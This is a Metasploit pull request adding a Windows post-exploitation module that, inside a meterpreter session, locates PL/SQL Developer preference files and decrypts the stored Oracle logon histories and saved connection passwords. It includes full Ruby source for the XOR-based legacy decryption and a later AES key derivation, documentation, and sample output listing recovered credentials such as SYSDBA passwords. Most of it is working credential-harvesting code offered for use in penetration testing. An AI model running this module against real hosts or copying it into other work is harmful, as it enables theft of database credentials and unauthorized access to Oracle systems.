### PR TITLE
Add Module for PL/SQL Developer to gather credentials

### DIFF
--- a/documentation/modules/post/windows/gather/credentials/plsql_developer.md
+++ b/documentation/modules/post/windows/gather/credentials/plsql_developer.md
@@ -1,17 +1,23 @@
 ## Vulnerable Application
 
-This module can decrypt the history of PL/SQL Deceloper, and passwords are available if the user chooses to remember the password.
+This module can decrypt the histories and connection credentials of PL/SQL Developer,
+and passwords are available if the user chooses to remember.
+
+Note: This module can only decrypt the passwords of PL/SQL Developer 14 and earlier versions.
+The passwords of PL/SQL Developer 15 and later versions are encrypted with a new algorithm,
+which is not supported by this module.
+
 Analysis of encryption algorithm [here](https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/).
 You can find its official website [here](https://www.allroundautomations.com/products/pl-sql-developer/).
 
 ## Verification Steps
 
-  1. Download and install PL/SQL Developer.
+  1. Download and install PL/SQL Developer 14 or earlier versions.
   2. (Optional) Change the PL/SQL Developer preference to save the passwords.
-  3. Use PL/SQL Developer to log in to oracle databases.
+  3. Use PL/SQL Developer to log in to oracle databases. Or add a connection in PL/SQL Developer manually.
   4. Get a `meterpreter` session on a Windows host.
-  5. Do: ```run post/windows/gather/credentials/plsql_developer```
-  6. The username, password (only when configured to save passwords), SID of logon histories will be printed.
+  5. Do: `run post/windows/gather/credentials/plsql_developer`
+  6. The username, password, SID of connections will be printed.
 
 ## Options
 
@@ -24,18 +30,20 @@ You can find its official website [here](https://www.allroundautomations.com/pro
 ```
 meterpreter > run windows/gather/credentials/plsql_developer
 
-[*] Gather PL/SQL Developer History and Passwords on WIN-XXXXXXXXXXX
+[*] Gather PL/SQL Developer Histories and Connections on WIN-XXXXXXXXXXX
 [*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
-PL/SQL Developer History and Passwords
-======================================
+[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
+PL/SQL Developer Histories and Credentials
+==========================================
 
-History
--------
-sys/oracle@ORCL AS SYSDBA
-test1/@ORCL
-test2/password2@ORCL
-user/password@server
+DisplayName           Username  Database  ConnectAs  Password         FilePath
+-----------           --------  --------  ---------  --------         --------
+                      user      server    Normal     password         C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
+                      sys       ORCL      SYSDBA     oracle           C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
+                      test1     ORCL      Normal                      C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
+                      test2     ORCL      Normal     password2        C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
+Imported History/ASD  eee       ttt       Normal     asdfg            C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
 
-[+] Passwords stored in: C:/Users/Administrator/.msf4/loot/20231026190630_default_127.0.0.1_host.plsql_devel_674990.txt
+[+] Passwords stored in: C:/Users/Administrator/.msf4/loot/20231108010519_default_172.18.14.79_host.plsql_devel_637423.txt
 meterpreter >
 ```

--- a/documentation/modules/post/windows/gather/credentials/plsql_developer.md
+++ b/documentation/modules/post/windows/gather/credentials/plsql_developer.md
@@ -3,16 +3,12 @@
 This module can decrypt the histories and connection credentials of PL/SQL Developer,
 and passwords are available if the user chooses to remember.
 
-Note: This module can only decrypt the passwords of PL/SQL Developer 14 and earlier versions.
-The passwords of PL/SQL Developer 15 and later versions are encrypted with a new algorithm,
-which is not supported by this module.
-
 Analysis of encryption algorithm [here](https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/).
 You can find its official website [here](https://www.allroundautomations.com/products/pl-sql-developer/).
 
 ## Verification Steps
 
-  1. Download and install PL/SQL Developer 14 or earlier versions.
+  1. Download and install PL/SQL Developer.
   2. (Optional) Change the PL/SQL Developer preference to save the passwords.
   3. Use PL/SQL Developer to log in to oracle databases. Or add a connection in PL/SQL Developer manually.
   4. Get a `meterpreter` session on a Windows host.
@@ -33,17 +29,19 @@ meterpreter > run windows/gather/credentials/plsql_developer
 [*] Gather PL/SQL Developer Histories and Connections on WIN-XXXXXXXXXXX
 [*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
 [*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
+[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer 15\Preferences\Administrator\user.prefs
 PL/SQL Developer Histories and Credentials
 ==========================================
 
-DisplayName           Username  Database  ConnectAs  Password         FilePath
------------           --------  --------  ---------  --------         --------
-                      user      server    Normal     password         C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
-                      sys       ORCL      SYSDBA     oracle           C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
-                      test1     ORCL      Normal                      C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
-                      test2     ORCL      Normal     password2        C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
-Imported History/ASD  eee       ttt       Normal     asdfg            C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
+DisplayName                Username  Database  ConnectAs  Password   FilePath
+-----------                --------  --------  ---------  --------   --------
+                           sys       ORCL      SYSDBA     oracle     C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
+                           test1     ORCL      Normal                C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
+                           test2     ORCL      Normal     password2  C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
+                           user      server    Normal     password   C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
+Imported Fixed Users/Test  sys       ORCL      SYSDBA     pass       C:\Users\Administrator\AppData\Roaming\PLSQL Developer 15\Preferences\Administrator\user.prefs
+Imported History/Test      sys       ORCL      SYSDBA     oracle     C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
 
-[+] Passwords stored in: C:/Users/Administrator/.msf4/loot/20231108010519_default_172.18.14.79_host.plsql_devel_637423.txt
+[+] Passwords stored in: C:/Users/Administrator/.msf4/loot/20231109050433_default_127.0.0.1_host.plsql_devel_357810.txt
 meterpreter >
 ```

--- a/documentation/modules/post/windows/gather/credentials/plsql_developer.md
+++ b/documentation/modules/post/windows/gather/credentials/plsql_developer.md
@@ -1,0 +1,43 @@
+## Vulnerable Application
+
+This module can decrypt the history of PL/SQL Deceloper, and passwords are available if the user chooses to remember the password.
+
+  Analysis of encryption algorithm [here](https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/).
+
+  You can find its official website [here](https://www.allroundautomations.com/products/pl-sql-developer/).
+
+## Verification Steps
+
+  1. Download and install PL/SQL Developer.
+  2. (Optional) Change the PL/SQL Developer preference to save the passwords.
+  3. Use PL/SQL Developer to log in to oracle databases.
+  4. Get a `meterpreter` session on a Windows host.
+  5. Do: ```run post/windows/gather/credentials/plsql_developer```
+  6. The username, password (only when configured to save passwords), SID of logon histories will be printed.
+
+## Options
+
+ **PLSQL_PATH**
+
+  - Specify the path of PL/SQL Developer
+
+## Scenarios
+
+```
+meterpreter > run windows/gather/credentials/plsql_developer
+
+[*] Gather PL/SQL Developer History and Passwords on WIN-XXXXXXXXXXX
+[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
+PL/SQL Developer History and Passwords
+======================================
+
+History
+-------
+sys/oracle@ORCL AS SYSDBA
+test1/@ORCL
+test2/password2@ORCL
+user/password@server
+
+[+] Passwords stored in: C:/Users/Administrator/.msf4/loot/20231026190630_default_127.0.0.1_host.plsql_devel_674990.txt
+meterpreter >
+```

--- a/documentation/modules/post/windows/gather/credentials/plsql_developer.md
+++ b/documentation/modules/post/windows/gather/credentials/plsql_developer.md
@@ -1,10 +1,8 @@
 ## Vulnerable Application
 
 This module can decrypt the history of PL/SQL Deceloper, and passwords are available if the user chooses to remember the password.
-
-  Analysis of encryption algorithm [here](https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/).
-
-  You can find its official website [here](https://www.allroundautomations.com/products/pl-sql-developer/).
+Analysis of encryption algorithm [here](https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/).
+You can find its official website [here](https://www.allroundautomations.com/products/pl-sql-developer/).
 
 ## Verification Steps
 

--- a/documentation/modules/post/windows/gather/credentials/plsql_developer.md
+++ b/documentation/modules/post/windows/gather/credentials/plsql_developer.md
@@ -33,14 +33,14 @@ meterpreter > run windows/gather/credentials/plsql_developer
 PL/SQL Developer Histories and Credentials
 ==========================================
 
-DisplayName                Username  Database  ConnectAs  Password   FilePath
------------                --------  --------  ---------  --------   --------
-                           sys       ORCL      SYSDBA     oracle     C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
-                           test1     ORCL      Normal                C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
-                           test2     ORCL      Normal     password2  C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
-                           user      server    Normal     password   C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
-Imported Fixed Users/Test  sys       ORCL      SYSDBA     pass       C:\Users\Administrator\AppData\Roaming\PLSQL Developer 15\Preferences\Administrator\user.prefs
-Imported History/Test      sys       ORCL      SYSDBA     oracle     C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
+DisplayName                              Username  Database  ConnectAs  Password   FilePath
+-----------                              --------  --------  ---------  --------   --------
+[Connections]/Imported Fixed Users/Test  sys       ORCL      SYSDBA     pass       C:\Users\Administrator\AppData\Roaming\PLSQL Developer 15\Preferences\Administrator\user.prefs
+[Connections]/Imported History/Test      sys       ORCL      SYSDBA     oracle     C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
+[LogonHistory]                           test2     ORCL      Normal     password2  C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
+[LogonHistory]                           test1     ORCL      Normal                C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
+[LogonHistory]                           sys       ORCL      SYSDBA     oracle     C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
+[LogonHistory]                           user      server    Normal     password   C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
 
 [+] Passwords stored in: C:/Users/Administrator/.msf4/loot/20231109050433_default_127.0.0.1_host.plsql_devel_357810.txt
 meterpreter >

--- a/modules/post/windows/gather/credentials/plsql_developer.rb
+++ b/modules/post/windows/gather/credentials/plsql_developer.rb
@@ -11,10 +11,10 @@ class MetasploitModule < Msf::Post
     super(
       update_info(
         info,
-        'Name' => 'Windows Gather PL/SQL Developer History and Passwords',
+        'Name' => 'Windows Gather PL/SQL Developer Connection Credentials',
         'Description' => %q{
-          This module can decrypt the history of a PL/SQL Developer,
-          and passwords are available if the user chooses to remember the password.
+          This module can decrypt the histories and connection credentials of PL/SQL Developer,
+          and passwords are available if the user chooses to remember.
         },
         'License' => MSF_LICENSE,
         'References' => [
@@ -49,13 +49,62 @@ class MetasploitModule < Msf::Post
     )
   end
 
-  def decrypt(str)
+  def decrypt_str_legacy(str)
     result = ''
     key = str[0..3].to_i
     for i in 1..(str.length / 4 - 1) do
       n = str[(i * 4)..(i * 4 + 3)].to_i
       result << (((n - 1000) ^ (key + i * 10)) >> 4).chr
     end
+    return result
+  end
+
+  def decrypt_str(str)
+    if str == ''
+      return ''
+    end
+
+    if str.match(/^\d{8,}$/) && str.length % 4 == 0
+      return decrypt_str_legacy(str)
+    end
+
+    print_warning('The password encryption algorithm has changed since PL/SQL Developer 15 and this module have not supported it.')
+    return '[Not Supported]'
+  end
+
+  def parse_history(str)
+    result = { DisplayName: '', Username: '', Database: '', ConnectAs: '', Password: '', Parent: '-1' }
+
+    if str.end_with?(' AS SYSDBA')
+      result[:ConnectAs] = 'SYSDBA'
+      str = str[0..-11]
+    elsif str.end_with?(' AS SYSOPER')
+      result[:ConnectAs] = 'SYSOPER'
+      str = str[0..-12]
+    else
+      result[:ConnectAs] = 'Normal'
+    end
+
+    # Database should be the last part after '@' sign
+    ind = str.rindex('@')
+    if ind.nil?
+      # Unexpected format, just use the whole string as DisplayName
+      result[:DisplayName] = str
+      return result
+    end
+
+    result[:Database] = str[(ind + 1)..]
+    str = str[0..(ind - 1)]
+
+    unless str.count('/') == 1
+      # Unexpected format, just use the whole string as DisplayName
+      result[:DisplayName] = str
+      return result
+    end
+
+    result[:Username] = str[0..(str.index('/') - 1)]
+    result[:Password] = str[(str.index('/') + 1)..]
+
     return result
   end
 
@@ -69,21 +118,84 @@ class MetasploitModule < Msf::Post
     print_status("Decrypting #{file_name}")
     result = []
 
-    decrypting = false
+    logon_history_section = false
+    connections_section = false
+
+    # Keys that we care about
+    keys = %w[DisplayName Number Parent IsFolder Username Database ConnectAs Password]
+    # Initialize obj with empty values
+    obj = Hash[keys.map { |k| [k.to_sym, ''] }]
+    # Folders
+    folders = {}
+
     file_contents.split("\n").each do |line|
       line.gsub!(/(\n|\r)/, '')
 
-      if !decrypting && line != '[LogonHistory]'
+      if line == '[LogonHistory]' && !(logon_history_section || connections_section)
+        logon_history_section = true
         next
-      elsif line == '[LogonHistory]'
-        decrypting = true
+      elsif line == '[Connections]' && !(logon_history_section || connections_section)
+        connections_section = true
         next
       elsif line == ''
-        decrypting = false
+        logon_history_section = false
+        connections_section = false
         next
       end
 
-      result << { history: decrypt(line) }
+      if logon_history_section
+        # Contents in [LogonHistory] section is plain encrypted strings
+        result << parse_history(decrypt_str_legacy(line))
+      elsif connections_section
+        # Contents in [Connections] section is key-value pairs
+        ind = line.index('=')
+        if ind.nil?
+          print_error("Invalid line: #{line}")
+          next
+        end
+
+        key = line[0..(ind - 1)]
+        value = line[(ind + 1)..]
+
+        if key == 'Password'
+          obj[:Password] = decrypt_str(value)
+        elsif obj.key?(key.to_sym)
+          obj[key.to_sym] = value
+        end
+
+        # Color is the last field of a connection
+        if key == 'Color'
+          if obj[:IsFolder] != '1'
+            result << obj
+          else
+            folders[obj[:Number]] = obj
+          end
+
+          # Reset obj
+          obj = Hash[keys.map { |k| [k.to_sym, ''] }]
+        end
+
+      end
+    end
+
+    result.each do |item|
+      pitem = item
+      while pitem[:Parent] != '-1'
+        pitem = folders[pitem[:Parent]]
+        if pitem.nil?
+          print_error("Invalid parent: #{item[:Parent]}")
+          break
+        end
+        item[:DisplayName] = pitem[:DisplayName] + '/' + item[:DisplayName]
+      end
+
+      # Remove fields used to build the display name
+      item.delete(:Parent)
+      item.delete(:Number)
+      item.delete(:IsFolder)
+
+      # Add file path
+      item[:FilePath] = file_name
     end
 
     return result
@@ -103,19 +215,26 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    print_status("Gather PL/SQL Developer History and Passwords on #{sysinfo['Computer']}")
+    print_status("Gather PL/SQL Developer Histories and Credentials on #{sysinfo['Computer']}")
     profiles = grab_user_profiles
     pref_paths = []
 
-    profiles.each { |user_profiles| pref_paths += enumerate_pref(user_profiles['AppData'] + session.fs.file.separator + 'PLSQL Developer') }
+    profiles.each do |user_profiles|
+      session.fs.dir.entries(user_profiles['AppData']).each do |dirname|
+        if dirname.start_with?('PLSQL Developer')
+          search_dir = user_profiles['AppData'] + session.fs.file.separator + dirname
+          pref_paths += enumerate_pref(search_dir)
+        end
+      end
+    end
     pref_paths += enumerate_pref(datastore['PLSQL_PATH']) if datastore['PLSQL_PATH'].present?
 
     result = []
     pref_paths.uniq.each { |pref_path| result += decrypt_pref(pref_path) }
 
     tbl = Rex::Text::Table.new(
-      'Header' => 'PL/SQL Developer History and Passwords',
-      'Columns' => ['History']
+      'Header' => 'PL/SQL Developer Histories and Credentials',
+      'Columns' => ['DisplayName', 'Username', 'Database', 'ConnectAs', 'Password', 'FilePath']
     )
 
     result.each do |item|
@@ -125,7 +244,7 @@ class MetasploitModule < Msf::Post
     print_line(tbl.to_s)
     # Only save data to disk when there's something in the table
     if tbl.rows.count > 0
-      path = store_loot('host.plsql_developer', 'text/plain', session, tbl, 'plsql_developer.txt', 'PL/SQL Developer History and Passwords')
+      path = store_loot('host.plsql_developer', 'text/plain', session, tbl, 'plsql_developer.txt', 'PL/SQL Developer Histories and Credentials')
       print_good("Passwords stored in: #{path}")
     end
   end

--- a/modules/post/windows/gather/credentials/plsql_developer.rb
+++ b/modules/post/windows/gather/credentials/plsql_developer.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post
         info,
         'Name' => 'Windows Gather PL/SQL Developer History and Passwords',
         'Description' => %q{
-          This module can decrypt the history of PL/SQL Deceloper,
+          This module can decrypt the history of a PL/SQL Developer,
           and passwords are available if the user chooses to remember the password.
         },
         'License' => MSF_LICENSE,
@@ -21,7 +21,8 @@ class MetasploitModule < Msf::Post
           [ 'URL', 'https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/']
         ],
         'Author' => [
-          'Jemmy Wang'
+          'Adam Caudill' # Discovery 
+          'Jemmy Wang' # msf module 
         ],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],

--- a/modules/post/windows/gather/credentials/plsql_developer.rb
+++ b/modules/post/windows/gather/credentials/plsql_developer.rb
@@ -1,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::UserProfiles
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Gather PL/SQL Developer History and Passwords',
+        'Description' => %q{
+          This module can decrypt the history of PL/SQL Deceloper,
+          and passwords are available if the user chooses to remember the password.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/']
+        ],
+        'Author' => [
+          'Jemmy Wang'
+        ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_fs_ls
+              stdapi_fs_separator
+              stdapi_fs_stat
+            ]
+          }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('PLSQL_PATH', [ false, 'Specify the path of PL/SQL Developer']),
+      ]
+    )
+  end
+
+  def decrypt(str)
+    result = ''
+    key = str[0..3].to_i
+    for i in 1..(str.length / 4 - 1) do
+      n = str[(i * 4)..(i * 4 + 3)].to_i
+      result << (((n - 1000) ^ (key + i * 10)) >> 4).chr
+    end
+    return result
+  end
+
+  def decrypt_pref(file_name)
+    file_contents = read_file(file_name)
+    if file_contents.nil? || file_contents.empty?
+      print_status "Skipping empty file: #{file_name}"
+      return []
+    end
+
+    print_status("Decrypting #{file_name}")
+    result = []
+
+    decrypting = false
+    file_contents.split("\n").each do |line|
+      line.gsub!(/(\n|\r)/, '')
+
+      if !decrypting && line != '[LogonHistory]'
+        next
+      elsif line == '[LogonHistory]'
+        decrypting = true
+        next
+      elsif line == ''
+        decrypting = false
+        next
+      end
+
+      result << { history: decrypt(line) }
+    end
+
+    return result
+  end
+
+  def enumerate_pref(plsql_path)
+    result = []
+    pref_dir = plsql_path + session.fs.file.separator + 'Preferences'
+    session.fs.dir.entries(pref_dir).each do |username|
+      udir = pref_dir + session.fs.file.separator + username
+      file_name = udir + session.fs.file.separator + 'user.prefs'
+
+      result << file_name if directory?(udir) && file?(file_name)
+    end
+
+    return result
+  end
+
+  def run
+    print_status("Gather PL/SQL Developer History and Passwords on #{sysinfo['Computer']}")
+    profiles = grab_user_profiles
+    pref_paths = []
+
+    profiles.each { |user_profiles| pref_paths += enumerate_pref(user_profiles['AppData'] + session.fs.file.separator + 'PLSQL Developer') }
+    pref_paths += enumerate_pref(datastore['PLSQL_PATH']) if datastore['PLSQL_PATH'].present?
+
+    result = []
+    pref_paths.uniq.each { |pref_path| result += decrypt_pref(pref_path) }
+
+    tbl = Rex::Text::Table.new(
+      'Header' => 'PL/SQL Developer History and Passwords',
+      'Columns' => ['History']
+    )
+
+    result.each do |item|
+      tbl << item.values
+    end
+
+    print_line(tbl.to_s)
+    # Only save data to disk when there's something in the table
+    if tbl.rows.count > 0
+      path = store_loot('host.plsql_developer', 'text/plain', session, tbl, 'plsql_developer.txt', 'PL/SQL Developer History and Passwords')
+      print_good("Passwords stored in: #{path}")
+    end
+  end
+end

--- a/modules/post/windows/gather/credentials/plsql_developer.rb
+++ b/modules/post/windows/gather/credentials/plsql_developer.rb
@@ -21,8 +21,8 @@ class MetasploitModule < Msf::Post
           [ 'URL', 'https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/']
         ],
         'Author' => [
-          'Adam Caudill' # Discovery 
-          'Jemmy Wang' # msf module 
+          'Adam Caudill', # Discovery
+          'Jemmy Wang' # msf module
         ],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],

--- a/modules/post/windows/gather/credentials/plsql_developer.rb
+++ b/modules/post/windows/gather/credentials/plsql_developer.rb
@@ -65,7 +65,8 @@ class MetasploitModule < Msf::Post
 
     cipher = OpenSSL::Cipher.new('aes-256-cfb8')
     cipher.decrypt
-    cipher.key = "\x9C\x1C\xEE\xF3\x8A\x3A\x24\x86\x0C\x3D\x2E\x85\xD2\x9E\x7A\x70\x34\xC1\xD8\x5F\x9C\x1C\xEE\xF3\x8A\x3A\x24\x86\x0C\x3D\x2E\x85"
+    hash = Digest::SHA1.digest('PL/SQL developer + Oracle 11.0.x')
+    cipher.key = hash + hash[0..11]
     cipher.iv = bytes[0..7] + "\x00" * 8
 
     return cipher.update(bytes[8..]) + cipher.final


### PR DESCRIPTION
Add a post/windows/gather/credential module to gather history/credentials from PL/SQL Developer, which is a widely used tool to manage Oracle Databases.

This module can decrypt the histories and connection credentials of PL/SQL Developer, and passwords are available if the user chooses to remember.

Analysis of encryption algorithm [here](https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/).
You can find its official website [here](https://www.allroundautomations.com/products/pl-sql-developer/).

The login credentials and histories are stored in `user.prefs` which can usually be found in following directories:
```
%AppData%\PLSQL Developer <Version>\Preferences\<username>\
%AppData%\PLSQL Developer\Preferences\<username>\
<installation path>\Preferences\<username>\
```
These are the default preference file path, from the latest version to the earliest version.

An example of v8, v9 `user.prefs` would be
```
ID=PL/SQL Developer Preference File

[General]
Name=General user preferences
Enabled=True
Order=-1
Rules=

<Omitted>

[LogonHistory]
273645624572423045763066456443024120413041724566408044424900419043284194407643904160

[DSA]
<Omitted>
```

The lines in the `[LogonHistory]` section can be decrypted as described [here](https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/). And the decrypted line in the example would be `user/password@server`

An example of v14 `user.prefs` would be
```
ID=PL/SQL Developer Preference File

[General]
Name=General user preferences
Enabled=True
Order=-1
Rules=

[Preferences]
LastNewsItem=02112023
PlanViewType=0
LastNewsRead=02112023

[Connections]
DisplayName=Imported Fixed Users
IsFolder=1
Number=0
Parent=-1
Username=
Database=
ConnectAs=
Edition=
Workspace=
AutoConnect=0
ConnectionMatch=536870911
Color=65535
DisplayName=Imported History
IsFolder=1
Number=1
Parent=-1
Username=
Database=
ConnectAs=
Edition=
Workspace=
AutoConnect=0
ConnectionMatch=536870911
Color=65535
DisplayName=Test
IsFolder=0
Number=2
Parent=1
Username=sys
Database=ORCL
ConnectAs=SYSDBA
Edition=
Workspace=
AutoConnect=0
ConnectionMatch=536870911
Password=2712415444684238431240824204
IdentifiedExt=0
Color=65535

<Omitted>
```

The `Password` in the `[Connections]` section can be decrypted with the exact same algorithm described above.

## Verification

List the steps needed to make sure this thing works

- [x] Download and install PL/SQL Developer 14 or earlier versions.
- [x] (Optional) Change the PL/SQL Developer preference to save the passwords.
- [x] Use PL/SQL Developer to log in to oracle databases. Or add a connection in PL/SQL Developer manually.
- [x] Get a `meterpreter` session on a Windows host.
- [x] Do: `run post/windows/gather/credentials/plsql_developer`
- [x] The username, password, SID of connections will be printed.

![image](https://github.com/rapid7/metasploit-framework/assets/37937841/73f7f717-08b7-49e5-aa79-435ba8aaabf0)
